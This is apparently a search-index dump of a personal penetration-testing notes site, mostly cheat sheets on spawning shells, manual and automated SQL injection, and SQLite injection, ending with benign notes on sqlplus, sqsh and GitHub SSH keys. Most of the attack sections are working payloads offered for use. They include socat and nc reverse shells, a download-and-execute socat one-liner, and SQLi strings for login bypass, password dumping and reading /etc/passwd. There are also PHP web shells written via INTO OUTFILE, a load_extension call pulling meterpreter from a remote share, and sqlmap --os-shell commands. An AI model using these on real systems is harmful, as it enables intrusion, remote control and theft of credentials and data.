bash -i\n\n# From inside a Python interpreter prompt\necho os.system('/bin/bash')\n
                        ","tags":["pentesting","terminal","shells"]},{"location":"spawn-a-shell/#python","title":"python","text":"
                         # using python for a pseudo terminal\npython -c 'import os; os.system(\"/bin/sh\")'\n
                         # using python for a pseudo terminal\npython -c 'import pty; pty.spawn(\"/bin/bash\")'\n\npython3 -c \"import pty;pty.spawn('/bin/bash')\"\n
                        ","tags":["pentesting","terminal","shells"]},{"location":"spawn-a-shell/#ssh","title":"ssh","text":"
                        /bin/sh -i\n
                        ","tags":["pentesting","terminal","shells"]},{"location":"spawn-a-shell/#perl","title":"perl","text":"
perl -e 'exec \"/bin/sh\";'\n\n# From inside a Perl interpreter\nperl: exec \"/bin/sh\";\n
                        ","tags":["pentesting","terminal","shells"]},{"location":"spawn-a-shell/#ruby","title":"ruby","text":"
                        ruby:\u00a0 exec \"/bin/sh\";\n
                        ","tags":["pentesting","terminal","shells"]},{"location":"spawn-a-shell/#lua","title":"lua","text":"
lua: os.execute('/bin/sh')\n
                        ","tags":["pentesting","terminal","shells"]},{"location":"spawn-a-shell/#socat","title":"socat","text":"
                        # Listener:\nsocat file:`tty`,raw,echo=0 tcp-listen:4444\n\n#Victim:\nsocat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444\n

If socat isn't installed, there are other options: standalone binaries can be downloaded from this GitHub repo: https://github.com/andrew-d/static-binaries

With a command injection vuln, it's possible to download the correct-architecture socat binary to a writable directory, chmod it, then execute a reverse shell in one line:

                        wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444\n

                        On Kali, run:

                        socat file:`tty`,raw,echo=0 tcp-listen:4444\n

and you'll catch a fully interactive TTY session. It supports tab-completion, SIGINT/SIGTSTP, vim, up-arrow history, etc. It's a full terminal.

                        ","tags":["pentesting","terminal","shells"]},{"location":"spawn-a-shell/#stty-options","title":"stty options","text":"
                        # In reverse shell\n$ python -c 'import pty; pty.spawn(\"/bin/bash\")'\n\n# Ctrl-Z\n\n\n# In Kali\n$ stty raw -echo\n$ fg\n
                        # In reverse shell\nreset\nexport SHELL=bash\nexport TERM=xterm-256color\nstty size\nstty rows <num> columns <cols>\n\n# In one line:\nreset; export SHELL=bash; export TERM=xterm-256color; stty rows <num> columns <cols>\n
                        ","tags":["pentesting","terminal","shells"]},{"location":"spawn-a-shell/#msfvenom","title":"msfvenom","text":"

You can generate a webshell by using msfvenom:

# List payloads\nmsfvenom --list payloads | grep x64 | grep linux | grep reverse\n

msfvenom can also use Metasploit payloads under \"cmd/unix\" to generate one-liner bind or reverse shells. List the options with:

                        msfvenom -l payloads | grep \"cmd/unix\" | awk '{print $1}'\n
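
For instance, a sketch that generates a bash reverse shell one-liner (LHOST/LPORT are placeholders):

msfvenom -p cmd/unix/reverse_bash LHOST=10.10.14.2 LPORT=4443 -f raw\n# -p: payload to generate; -f raw: print the resulting one-liner to stdout\n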
                        ","tags":["pentesting","terminal","shells"]},{"location":"spawn-a-shell/#awk","title":"awk","text":"
                        awk 'BEGIN {system(\"/bin/sh\")}'\n
                        ","tags":["pentesting","terminal","shells"]},{"location":"spawn-a-shell/#find","title":"find","text":"
                        find / -name nameoffile -exec /bin/awk 'BEGIN {system(\"/bin/sh\")}' \\;\n# This use of the find command is searching for any file listed after the -name option, then it executes awk (/bin/awk) and runs the same script we discussed in the awk section to execute a shell interpreter.\n\nfind . -exec /bin/sh \\; -quit\n# This use of the find command uses the execute option (-exec) to initiate the shell interpreter directly. If find can't find the specified file, then no shell will be attained.\n
                        ","tags":["pentesting","terminal","shells"]},{"location":"spawn-a-shell/#vim","title":"VIM","text":"
                        vim -c ':!/bin/sh'\n

                        VIM escape:

                        vim\n:set shell=/bin/sh\n:shell\n
                        ","tags":["pentesting","terminal","shells"]},{"location":"sqli-manual-attack/","title":"SQLi Cheat sheet for manual injection","text":"

                        Resources

                        • See a more detailed explanation about SQL injection.
                        • PayloadsAllTheThings Original payloads for different SQL databases.
                        OWASP

                        OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.5. Testing for SQL Injection

                        ID Link to Hackinglife Link to OWASP Description 7.5 WSTG-INPV-05 Testing for SQL Injection - Identify SQL injection points. - Assess the severity of the injection and the level of access that can be achieved through it. Languages and dictionaries Server Dictionary MySQL MySQL payloads. MSSQL MSSQL payloads. PostgreSQL PostgreSQL payloads. Oracle Oracle SQL payloads. SQLite SQLite payloads. Cassandra Cassandra payloads. Attack-based dictionaries
                        • Generic SQL Injection Payloads
                        • Generic Error Based Payloads.
                        • Generic Union Select Payloads.
                        • SQL time based payloads .
                        • SQL Injection Auth Bypass Payloads
                        ","tags":["pentesting"]},{"location":"sqli-manual-attack/#comment-injection","title":"Comment injection","text":"

                        Put a line comment at the end to comment out the rest of the query.

                        Valid for MySQL, SQL Server, PostgreSQL, Oracle, SQLite:

                        -- comment      // MySQL [Note the space after the double dash]\n--comment       // MSSQL\n--comment       // PostgreSQL\n--comment       // Oracle\n\n\n/*comment*/     // MySQL\n/*comment*/     // MSSQL\n/*comment*/     // PostgreSQL\n\n#comment        // MySQL\n
                        ","tags":["pentesting"]},{"location":"sqli-manual-attack/#boolean-based-testing","title":"Boolean-based testing","text":"","tags":["pentesting"]},{"location":"sqli-manual-attack/#integer-based-parameter-injection","title":"Integer based parameter injection","text":"

Common in integer-based parameter injection, such as:

                        URL: https://site.com/user.php?id=1\nSQL query: SELECT * FROM users WHERE id= FUZZ;\n

                        Typical payloads for that query:

# Return true\nAND 1\nAND true\n\n# Return false\nAND 0\nAND false\n\n# If the parameter is evaluated, injecting 1*56 behaves like id=56 (vulnerable); if it is treated literally, the record for id=1 is returned (not vulnerable)\n1*56\n
                        ","tags":["pentesting"]},{"location":"sqli-manual-attack/#string-based-parameter-injection","title":"String based parameter injection","text":"
                        URL: https://site.com/user.php?id=alexis\nSQL query: SELECT * FROM users WHERE name= 'FUZZ';\n

                        Typical payloads for that query:

                        # Return true\n''\n\"\"\n\n# Return false\n'\n\"\n

Exploiting the single quote ('): in SQL, the single quote delimits string literals. One way to exploit this is in a login form:

# SQL query\nSELECT * FROM users WHERE username = '<username>' AND password = '<password>'\n\n# Payload\n' OR '1'='1'; --\n\n# The attacker's injected SQL code ' OR '1'='1'; -- causes the condition '1'='1' to evaluate to true, effectively bypassing the authentication mechanism. The modified query becomes:\nSELECT * FROM users WHERE username = '' OR '1'='1'; -- ' AND password = '<password>'\n
                        ","tags":["pentesting"]},{"location":"sqli-manual-attack/#error-based-testing","title":"Error-based testing","text":"Dictionaries

                        https://github.com/amandaguglieri/dictionaries/blob/main/SQL/error-based

Firstly, every DBMS/RDBMS responds to incorrect/erroneous SQL queries with different error messages, so an error response can be used to fingerprint the database:

                        A typical error from MS-SQL will look like this:

                        Incorrect syntax near [query snippet]\n

                        While a typical MySQL error looks more like this:

                        You have an error in your SQL syntax. Check the manual that corresponds\nto your MySQL server version for the right syntax to use near [query\nsnippet]\n
                        ","tags":["pentesting"]},{"location":"sqli-manual-attack/#union-attack","title":"UNION attack","text":"Dictionaries

                        https://github.com/amandaguglieri/dictionaries/blob/main/SQL/union-select

                        ","tags":["pentesting"]},{"location":"sqli-manual-attack/#mysql","title":"MYSQL","text":"
#########\nMYSQL\n#########\n\n# Access (using null characters)\n' OR '1'='1' %00\n' OR '1'='1' %16\n\n# 1. Bypass a form\n1' OR '1'='1';#\n' OR '1'='1';#\n1' OR '1'='1';-- -\n' OR '1'='1';-- -\n\n# 2. Number of columns (UNION attack)\n1' OR '1'='1' order by 1;#\n1' OR '1'='1' order by 2;#\n1' OR '1'='1' order by 3;#\n...\n# Do this until you get an error message; then you will know the number of columns\n# Another method to see the number of columns:\n' OR '1'='1' order by 1;-- -\n\n# 3. Get which column is being displayed. For instance, when we know we have 6 columns:\n1' OR '1'='1' UNION SELECT 1,2,3,4,5,6;#\n\n# 4. Get names of all databases\n1' OR '1'='1' UNION SELECT null,table_schema,null,null,null,null FROM information_schema.tables;#\n# 4b. Equivalent in SQLite (name and schema of the tables stored in the database):\na' or '1'='1' union select tbl_name,2,3,4,5 from sqlite_master --\n\n# 5. Get names of all tables from the selected database\n1' OR '1'='1' UNION SELECT null,table_name,null,null,null,null FROM information_schema.tables;#\n\n# 6. Get the name of all columns of a selected table from a selected database\n1' OR '1'='1' UNION SELECT null,column_name,null,null,null,null FROM information_schema.columns WHERE table_name='users';#\n\n# 7. Get the value of a selected column (for instance, password)\n1' OR '1'='1' UNION SELECT null,passwords,null,null,null,null FROM users;#\n\n1' OR '1'='1' UNION SELECT null,passwords,null,null,null,null FROM <databaseName.tableName>;#\n
                        ","tags":["pentesting"]},{"location":"sqli-manual-attack/#sqlite","title":"SQLite","text":"
#########\nSQLite\n#########\n\n# Ensure that the targeted parameter is vulnerable\n1' a' or '1'='1' --\n\n# Determine the number of columns of the query\n1' a' or '1'='1' order by 1 -- //returns all results\n1' a' or '1'='1' order by 2 -- //returns all results\n1' a' or '1'='1' order by 3 -- //returns all results\n1' a' or '1'='1' order by 4 -- //returns all results\n1' a' or '1'='1' order by 5 -- //returns all results\n1' a' or '1'='1' order by 6 -- //returns none\n# Therefore the query contains 5 columns.\n\n# Determine which columns are being returned\n1' a' or '1'='1' UNION SELECT 1,2,3,4,5 -- \n# The table in this demo returned values 1,3,4,5. Value 2 was not returned.\n\n# Extract version of sqlite database\n1' a' or '1'='1' UNION SELECT sqlite_version(),NULL,NULL,NULL,NULL -- \n\n# Determine the name and schema of the tables stored in the database.\na' or '1'='1' union select tbl_name,2,3,4,5 from sqlite_master --\n\n# Determine the SQL command used to construct the tables:\na' or '1'='1' union select sql,2,3,4,5 from sqlite_master --\n# In this demo it returned:\n1   CREATE TABLE results (rollno text primary key, email text, name text, marks real, rank integer) 4   5\n1   CREATE TABLE secret_flag (flag text, value text)    4   5\n\n# Retrieve two columns from a table\na' or '1'='1' union select flag,2,value,4,5 from secret_flag --\n

Also, once we know which column is injectable, there are some SQL functions that can provide us with valuable data:

                        database()\nuser()\nversion()\nsqlite_version()\n

Also, interesting payloads for retrieving concatenated values in a UNION-based attack:

                        ## Extract database names, table names and column names\n\n#Database names\n-1' UniOn Select 1,2,gRoUp_cOncaT(0x7c,schema_name,0x7c) fRoM information_schema.schemata\n\n#Tables of a database\n-1' UniOn Select 1,2,3,gRoUp_cOncaT(0x7c,table_name,0x7C) fRoM information_schema.tables wHeRe table_schema=[database]\n\n#Column names\n-1' UniOn Select 1,2,3,gRoUp_cOncaT(0x7c,column_name,0x7C) fRoM information_schema.columns wHeRe table_name=[table name]\n

And here is an example of how to retrieve them:

# if injectable columns are number 2, 3 and 4 you can display some info from the system\nunion select 1, database(),user(),version(),5\n\n# Extra bonus\n# You can also load a file from the system with\nunion select 1, load_file('/etc/passwd'),3,4,5\n\n# and you can try to write to a file in the server\nunion select 1,'example example',3,4,5 into outfile '/var/www/path/to/file.txt'\nunion select 1,'example example',3,4,5 into outfile '/tmp/file.txt'\n\n# and we can combine that with a reverse shell like\nunion select 1,'<?passthru(\"nc -e /bin/sh <attacker IP> <attacker port>\") ?>', 3,4,5 into outfile '/tmp/reverse.php'\n
                        ","tags":["pentesting"]},{"location":"sqli-manual-attack/#sqli-blind-attack","title":"SQLi Blind attack","text":"

First, check the application's response to different requests (with true/false statements). If you can tell true responses from false responses and validate that the application is processing the boolean values, then you can apply this technique. For that purpose the AND operator is the most useful.

                        ","tags":["pentesting"]},{"location":"sqli-manual-attack/#boolean-based","title":"Boolean based","text":"Dictionaries

                        https://github.com/amandaguglieri/dictionaries/blob/main/SQL/error-based

                        user() returns the name of the user currently using the database. substring() returns a substring of the given argument. It takes three parameters: the input string, the position of the substring and its length.

                        Boolean based query:

                        ' OR substring(user(), 1, 1) = 'a\n' OR substring(user(), 1, 1) = 'b\n

                        More interesting queries:

                        # Database version\n1 and substring(version(), 1, 1) = 4--\n\n# Check that second character of the column user_email for user_name admin from table users is greater than the 'c' character  \n1 and substring((SELECT user_email FROM users WHERE user_name = 'admin'),2,1) > 'c'\n
                        ","tags":["pentesting"]},{"location":"sqli-manual-attack/#time-based","title":"Time based","text":"Dictionaries

                        https://github.com/amandaguglieri/dictionaries/blob/main/SQL/time-based

                        Resources

                        • OWASP resources

                        Vulnerable SQL query:

                        SELECT * from users WHERE username = '[username]' AND password = '[password]';\n

                        Time base query:

                        ' OR SLEEP(5) -- '\n

                        Interesting queries:

1' AND IF(SUBSTRING(user(),1,1)='r', sleep(0), sleep(10));#\n

                        Examples of available wait/timeout functions include:

                        • WAITFOR DELAY '0:0:10'\u00a0in SQL Server
                        • BENCHMARK()\u00a0and\u00a0sleep(10)\u00a0in MySQL
                        • pg_sleep(10)\u00a0in PostgreSQL
                        ","tags":["pentesting"]},{"location":"sqli-manual-attack/#extra-bonus-bypassing-quotation-marks","title":"Extra Bonus: Bypassing quotation marks","text":"

Sometimes quotation marks get filtered in SQL queries. To bypass this when querying a table name, we can skip the quotation marks by encoding the table name directly as a HEX value.
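
A minimal sketch in MySQL, assuming we want to reference the string 'users' without quotes:

# 0x7573657273 is the hex encoding of 'users'\nSELECT column_name FROM information_schema.columns WHERE table_name = 0x7573657273\n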

                        More bypassing tips:

# Using mixed upper and lowercase\n\n# Using spaces url encoded\n+\n\n# Using comments\n/**/\n/**\n--\n; --\n; /*\n; //\n\n# Example of bypassing webpages that only display one value at a time\n1'+uNioN/**/sEleCt/**/table_name,2+fROm+information_schema.tables+where+table_schema='dvwa'+limit+1,1%23&Submit=Submit#\n
                        ","tags":["pentesting"]},{"location":"sqli-manual-attack/#extra-bonus-gaining-a-reverse-shell-from-sql-injection","title":"Extra Bonus: Gaining a reverse shell from SQL injection","text":"

Take a WordPress installation that uses a MySQL database. If you manage to log in to the MySQL panel (/phpmyadmin) as root, then you could upload a PHP shell to the /wp-content/uploads/ folder.

                        Select \"<?php echo shell_exec($_GET['cmd']);?>\" into outfile \"/var/www/https/blogblog/wp-content/uploads/shell.php\";\n
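Once the shell is written, commands can be run through it; a usage sketch (the path depends on the WordPress installation):

curl 'http://victim.site/blogblog/wp-content/uploads/shell.php?cmd=id'\n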
                        ","tags":["pentesting"]},{"location":"sqli-manual-attack/#extra-bonus-dual","title":"Extra Bonus: DUAL","text":"

DUAL is a special one-row, one-column table present by default in all Oracle databases. The owner of DUAL is SYS, but it can be accessed by every user. This is a possible payload for SQLi:

                        '+UNION+SELECT+NULL+FROM+dual--\n

Oracle syntax requires the use of FROM, but some queries don't require any table. For these cases we use DUAL. Also, Oracle doesn't support queries that employ information_schema.tables.
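
Instead, tables can be enumerated from Oracle's data dictionary views; a sketch assuming a two-column UNION:

'+UNION+SELECT+table_name,NULL+FROM+all_tables--\n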

                        ","tags":["pentesting"]},{"location":"sqlite/","title":"SQLite injections","text":"","tags":["database","relational","database","SQL"]},{"location":"sqlite/#basic-payloads","title":"Basic payloads","text":"
# Ensure that the targeted parameter is vulnerable\n1' a' or '1'='1' --\n\n# Determine the number of columns of the query\n1' a' or '1'='1' order by 1 -- //returns all results\n1' a' or '1'='1' order by 2 -- //returns all results\n1' a' or '1'='1' order by 3 -- //returns all results\n1' a' or '1'='1' order by 4 -- //returns all results\n1' a' or '1'='1' order by 5 -- //returns all results\n1' a' or '1'='1' order by 6 -- //returns none\n# Therefore the query contains 5 columns.\n\n# Determine which columns are being returned\n1' a' or '1'='1' UNION SELECT 1,2,3,4,5 -- \n# The table in this demo returned values 1,3,4,5. Value 2 was not returned.\n\n# Extract version of sqlite database\n1' a' or '1'='1' UNION SELECT sqlite_version(),NULL,NULL,NULL,NULL -- \n\n# Determine the name and schema of the tables stored in the database.\na' or '1'='1' union select tbl_name,2,3,4,5 from sqlite_master --\n\n# Determine the SQL command used to construct the tables:\na' or '1'='1' union select sql,2,3,4,5 from sqlite_master --\n# In this demo it returned:\n1   CREATE TABLE results (rollno text primary key, email text, name text, marks real, rank integer) 4   5\n1   CREATE TABLE secret_flag (flag text, value text)    4   5\n\n# Retrieve two columns from a table\na' or '1'='1' union select flag,2,value,4,5 from secret_flag --\n

                        Source: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/SQLite%20Injection.md

# SQLite comments\n--\n/**/\n\n# SQLite version\nselect sqlite_version();\n\n# String based: Extract database structure\nSELECT sql FROM sqlite_schema\n\n# Integer or String based: Extract table name\nSELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'\n\n# Integer or String based: Extract column name\nSELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='table_name'\n\n# For a clean output\nSELECT replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(substr((substr(sql,instr(sql,'(')%2b1)),instr((substr(sql,instr(sql,'(')%2b1)),'')),\"TEXT\",''),\"INTEGER\",''),\"AUTOINCREMENT\",''),\"PRIMARY KEY\",''),\"UNIQUE\",''),\"NUMERIC\",''),\"REAL\",''),\"BLOB\",''),\"NOT NULL\",''),\",\",'~~') FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name NOT LIKE 'sqlite_%' AND name ='table_name'\n\n# Cleaner output\nSELECT GROUP_CONCAT(name) AS column_names FROM pragma_table_info('table_name');\n\n# Boolean: Count number of tables\nand (SELECT count(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' ) < number_of_table\n\n# Boolean: Enumerating table name\nand (SELECT length(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name not like 'sqlite_%' limit 1 offset 0)=table_name_length_number\n\n# Boolean: Extract info\nand (SELECT hex(substr(tbl_name,1,1)) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' limit 1 offset 0) > hex('some_char')\n\n# Boolean: Extract info (order by)\nCASE WHEN (SELECT hex(substr(sql,1,1)) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' limit 1 offset 0) = hex('some_char') THEN <order_element_1> ELSE <order_element_2> END\n\n# Boolean: Error based\nAND CASE WHEN [BOOLEAN_QUERY] THEN 1 ELSE load_extension(1) END\n\n# Time based\nAND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))\n
                        ","tags":["database","relational","database","SQL"]},{"location":"sqlite/#remote-command-execution-using-sqlite-command-attach-database","title":"Remote Command Execution using SQLite command - Attach Database","text":"
                        ATTACH DATABASE '/var/www/lol.php' AS lol;\nCREATE TABLE lol.pwn (dataz text);\nINSERT INTO lol.pwn (dataz) VALUES (\"<?php system($_GET['cmd']); ?>\");--\n
                        ","tags":["database","relational","database","SQL"]},{"location":"sqlite/#remote-command-execution-using-sqlite-command-load_extension","title":"Remote Command Execution using SQLite command - Load_extension","text":"
                        UNION SELECT 1,load_extension('\\\\evilhost\\evilshare\\meterpreter.dll','DllMain');--\n
                        ","tags":["database","relational","database","SQL"]},{"location":"sqlite/#references","title":"References","text":"

• Injecting SQLite database based application - Manish Kishan Tanwar
• SQLite Error Based Injection for Enumeration

                        ","tags":["database","relational","database","SQL"]},{"location":"sqlmap/","title":"sqlmap - A tool for testing SQL injection","text":"","tags":["pentesting"]},{"location":"sqlmap/#get-parameter","title":"GET parameter","text":"
sqlmap -u 'http://victim.site/view.php?id=112' -p id --technique=U\n# -p: to indicate an injectable parameter\n# --technique=U: to indicate a UNION-based SQL injection technique (E: error-based)\n# -b: banner of the database\n# --tor: to use a proxy to connect to the target URL\n# -v3: to see the payloads that sqlmap is using\n# --flush-session: to refresh sessions\n# --tamper: default tampers are in /usr/share/sqlmap/tamper\n
                        ","tags":["pentesting"]},{"location":"sqlmap/#post-parameter","title":"POST parameter","text":"
                        sqlmap -u <URL> --data=<POST string> -p parameter [options]\n
                        ","tags":["pentesting"]},{"location":"sqlmap/#using-r-file","title":"Using -r file","text":"

Capture the request with Burp Suite and save it to a file.

# Get all databases\nsqlmap -r nameoffiletoinject --method POST --data \"parameter=lala\" -p parameter --dbs\n\n# Get all tables\nsqlmap -r nameoffiletoinject --tables\n\n# Get all columns of a given database, for example dvwa\nsqlmap -r nameoffiletoinject -D dvwa --columns\n\n# Get all tables of a given database, for example dvwa\nsqlmap -r nameoffiletoinject -D dvwa --tables\n\n# Get all columns of a given table in a given database\nsqlmap -r nameoffiletoinject -D dvwa -T users --columns\n\n# Dump users table\nsqlmap -r nameoffiletoinject -D dvwa -T users --dump\n\n# Get columns username and password of table users from database dvwa\nsqlmap -r nameoffiletoinject -D dvwa -T users -C username,password --dump\n\n# Automatically attempt to upload a web shell using the vulnerable parameter and execute it\nsqlmap -r nameoffiletoinject -p vuln-param --os-shell\n\n# Alternatively use the --os-pwn option to gain a shell using meterpreter or vnc\nsqlmap -r nameoffiletoinject -p vuln-param --os-pwn\n
                        ","tags":["pentesting"]},{"location":"sqlmap/#using-url","title":"Using URL","text":"

                        You can also provide the url with --url or -u

sqlmap --url 'http://victim.site' --dbs --batch\nsqlmap --url 'http://victim.site' --users      # gets users\nsqlmap --url 'http://victim.site' --tables     # gets all tables\nsqlmap --url 'http://victim.site' --batch\n\n\n# Check what users we have and which privileges that user has.\nsqlmap -u $IP/path.php --forms --cookie=\"PHPSESSID=v5098os3cdua2ps0nn4ueuvuq6\" --batch --users\n\n# Dump the password hash for a user (postgres in the example) and exploit that super permission.\nsqlmap -u http://10.129.95.174/dashboard.php --forms --cookie=\"PHPSESSID=e14ch3u8gfbq8u3h97t8bqss9o\" -U postgres --password --batch\n\n# Get a shell\nsqlmap -u http://10.129.95.174/dashboard.php --forms --cookie=\"PHPSESSID=e14ch3u8gfbq8u3h97t8bqss9o\" --batch --os-shell\n
                        ","tags":["pentesting"]},{"location":"sqlmap/#getting-a-direct-sql-shell","title":"Getting a direct SQL Shell","text":"
# Get an OS shell\nsqlmap --url 'http://victim.site' --os-shell\n\n# Get a SQL shell\nsqlmap --url 'http://victim.site' --sql-shell\n
                        ","tags":["pentesting"]},{"location":"sqlmap/#suffixes-and-preffixes","title":"Suffixes and preffixes","text":"","tags":["pentesting"]},{"location":"sqlmap/#set-a-suffix","title":"Set a suffix","text":"
                        sqlmap -u \"http://example.com/?id=1\"  -p id --suffix=\"-- \"\n
                        ","tags":["pentesting"]},{"location":"sqlmap/#prefix","title":"Prefix","text":"
                        sqlmap -u \"http://example.com/?id=1\"  -p id --prefix=\"') \"\n
                        ","tags":["pentesting"]},{"location":"sqlmap/#injections-in-headers-and-other-http-methods","title":"Injections in Headers and other HTTP Methods","text":"
                        #Inside cookie\nsqlmap  -u \"http://example.com\" --cookie \"mycookies=*\"\n\n#Inside some header\nsqlmap -u \"http://example.com\" --headers=\"x-forwarded-for:127.0.0.1*\"\nsqlmap -u \"http://example.com\" --headers=\"referer:*\"\n\n#PUT Method\nsqlmap --method=PUT -u \"http://example.com\" --headers=\"referer:*\"\n\n#The injection is located at the '*'\n
                        ","tags":["pentesting"]},{"location":"sqlmap/#tampers","title":"Tampers","text":"
                        sqlmap -r request.txt --tamper=space2comment\n# space2comment: changes whitespace to /**/\n
                        Tamper Description apostrophemask.py Replaces apostrophe character with its UTF-8 full width counterpart apostrophenullencode.py Replaces apostrophe character with its illegal double unicode counterpart appendnullbyte.py Appends encoded NULL byte character at the end of payload base64encode.py Base64 all characters in a given payload between.py Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #' bluecoat.py Replaces space character after SQL statement with a valid random blank character.Afterwards replace character = with LIKE operator chardoubleencode.py Double url-encodes all characters in a given payload (not processing already encoded) commalesslimit.py Replaces instances like 'LIMIT M, N' with 'LIMIT N OFFSET M' commalessmid.py Replaces instances like 'MID(A, B, C)' with 'MID(A FROM B FOR C)' concat2concatws.py Replaces instances like 'CONCAT(A, B)' with 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)' charencode.py Url-encodes all characters in a given payload (not processing already encoded) charunicodeencode.py Unicode-url-encodes non-encoded characters in a given payload (not processing already encoded). \"%u0022\" charunicodeescape.py Unicode-url-encodes non-encoded characters in a given payload (not processing already encoded). \"\\u0022\" equaltolike.py Replaces all occurances of operator equal ('=') with operator 'LIKE' escapequotes.py Slash escape quotes (' and \") greatest.py Replaces greater than operator ('>') with 'GREATEST' counterpart halfversionedmorekeywords.py Adds versioned MySQL comment before each keyword ifnull2ifisnull.py Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)' modsecurityversioned.py Embraces complete query with versioned comment modsecurityzeroversioned.py Embraces complete query with zero-versioned comment multiplespaces.py Adds multiple spaces around SQL keywords nonrecursivereplacement.py Replaces predefined SQL keywords with representations suitable for replacement (e.g. 
.replace(\"SELECT\", \"\")) filters percentage.py Adds a percentage sign ('%') infront of each character overlongutf8.py Converts all characters in a given payload (not processing already encoded) randomcase.py Replaces each keyword character with random case value randomcomments.py Add random comments to SQL keywords securesphere.py Appends special crafted string sp_password.py Appends 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs space2comment.py Replaces space character (' ') with comments space2dash.py Replaces space character (' ') with a dash comment ('--') followed by a random string and a new line ('\\n') space2hash.py Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\\n') space2morehash.py Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\\n') space2mssqlblank.py Replaces space character (' ') with a random blank character from a valid set of alternate characters space2mssqlhash.py Replaces space character (' ') with a pound character ('#') followed by a new line ('\\n') space2mysqlblank.py Replaces space character (' ') with a random blank character from a valid set of alternate characters space2mysqldash.py Replaces space character (' ') with a dash comment ('--') followed by a new line ('\\n') space2plus.py Replaces space character (' ') with plus ('+') space2randomblank.py Replaces space character (' ') with a random blank character from a valid set of alternate characters symboliclogical.py Replaces AND and OR logical operators with their symbolic counterparts (&& and unionalltounion.py Replaces UNION ALL SELECT with UNION SELECT unmagicquotes.py Replaces quote character (') with a multi-byte combo %bf%27 together with generic comment at the end (to make it work) uppercase.py Replaces each keyword character with upper case value 'INSERT' varnish.py Append a HTTP header 'X-originating-IP' versionedkeywords.py Encloses each non-function keyword with versioned MySQL comment versionedmorekeywords.py Encloses each keyword with versioned MySQL comment xforwardedfor.py Append a fake HTTP header 'X-Forwarded-For'","tags":["pentesting"]},{"location":"sqlplus/","title":"sqlplus - To connect and manage the Oracle RDBMS","text":"

SQL*Plus is a command-line tool that provides access to the Oracle RDBMS. SQL*Plus enables you to:

• Enter SQL*Plus commands to configure the SQL*Plus environment.
• Start up and shut down an Oracle database.
                        • Connect to an Oracle database.
                        • Enter and execute SQL commands and PL/SQL blocks.
                        • Format and print query results.
                        ","tags":["oracle tns","port 1521","tools"]},{"location":"sqlplus/#connect-to-oracle-database","title":"Connect to Oracle database","text":"

                        If we manage to get some credentials we can connect to the Oracle TNS service with sqlplus.

                        sqlplus <username>/<password>@$ip/XE;\n

If you get the error message (sqlplus: error while loading shared libraries: libsqlplus.so: cannot open shared object file: No such file or directory), there is an issue with the shared libraries. Possible solution:

                        sudo sh -c \"echo /usr/lib/oracle/12.2/client64/lib > /etc/ld.so.conf.d/oracle-instantclient.conf\";sudo ldconfig\n
                        ","tags":["oracle tns","port 1521","tools"]},{"location":"sqlplus/#basic-commands","title":"Basic commands","text":"

                        All commands from Oracle's documentation.

                        # List all available tables in the current database\nselect table_name from all_tables;\n\n# Show the privileges of the current user\nselect * from user_role_privs;\n
                        ","tags":["oracle tns","port 1521","tools"]},{"location":"sqsh/","title":"sqsh","text":"","tags":["database","cheat sheet","mssql"]},{"location":"sqsh/#installation","title":"Installation","text":"

                        Pre-installed in Kali. Used to interact with MSSQL (Microsoft SQL Server) from Linux.

                         # Connect to mssql server\n sqsh -S $IP -U username -P Password123 -h\n # -h: disable headers and footers for a cleaner look.\n\n# When using Windows Authentication, we need to specify the domain name or the hostname of the target machine. If we don't specify a domain or hostname, it will assume SQL Authentication.\nsqsh -S $ip -U .\\\\<username> -P 'MyPassword!' -h\n# For windows authentication we can use  SERVERNAME\\\\accountname or .\\\\accountname\n

When connected to MSSQL, commands are executed only after you enter the GO command.
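
For example, a session sketch (the query is only sent once GO is entered):

1> SELECT name FROM master.dbo.sysdatabases\n2> GO\n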

                        ","tags":["database","cheat sheet","mssql"]},{"location":"ssh-audit/","title":"ssh-audit","text":""},{"location":"ssh-audit/#installation","title":"Installation","text":"

                        Download from github repo: https://github.com/jtesta/ssh-audit.

                        git clone https://github.com/jtesta/ssh-audit.git \n
                        "},{"location":"ssh-audit/#basic-usage","title":"Basic usage","text":"
                        ./ssh-audit.py $ip\n
                        "},{"location":"ssh-for-github/","title":"SSH for github","text":""},{"location":"ssh-for-github/#how-to-configure-multiple-two-or-more-deploy-keys-for-different-private-github-repositories-on-the-same-computer-without-using-ssh-agent","title":"How to configure multiple two or more deploy keys for different private github repositories on the same computer without using ssh-agent","text":"

Let's say I want to have SSH key A for repo1 and SSH key B for repo2.

1. Create an SSH key pair for each repository:
                        ssh-keygen -t ed25519 -C \"your_email@example.com\"\n# ed25519 is the algorithm\n

                        For the second key and the subsequent ones, you will need to specify a different name.
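
For instance (the repo2_key file name is just an example):

ssh-keygen -t ed25519 -C \"your_email@example.com\" -f ~/.ssh/repo2_key\n# -f: write the key pair to the given path instead of the default\n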

                        • Private key should have permissions set to 600.
                        • .ssh folder should have permissions set to 700.

• Add your SSH keys to the ssh-agent. In my case:

                        # start the ssh-agent in the background\neval \"$(ssh-agent -s)\"\n\n# add your ssh private key to the ssh-agent.\nssh-add ~/.ssh/id_ed25519\n
2. Add your SSH public keys as deploy keys in the Settings tab of repo1 and repo2.

3. Edit the .git/config file in both repositories:

